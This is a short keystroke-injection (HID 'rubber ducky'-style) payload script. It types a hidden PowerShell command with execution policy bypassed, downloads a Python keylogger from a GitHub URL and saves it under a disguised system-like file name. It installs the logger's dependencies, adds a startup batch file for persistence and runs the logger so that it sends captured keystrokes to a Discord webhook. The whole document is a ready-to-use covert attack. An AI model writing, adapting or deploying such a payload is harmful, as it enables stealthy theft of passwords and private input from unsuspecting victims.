DELAY 1000
GUI R
DELAY 300
STRING powershell
DELAY 150
ENTER
DELAY 1700
STRING powershell -w h -NoP -NonI -Exec Bypass -c "mkdir 'C:\system32\' ; cd C:\system32\ ; iwr -Uri https://raw.githubusercontent.com/simen64/Pico-HID-Scripts/main/discord-keylogger/logger.py -OutFile C:\system32\sys-file.py ; py -m pip install discordwebhook pynput ; echo '@echo off' > startup.bat ; echo 'start /B pythonw.exe "C:\system32\sys-file.py"' >> startup.bat
cp 'C:\system32\startup.bat' '$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ; Python sys-file.py <your discord webhook here>"
DELAY 200
ENTER
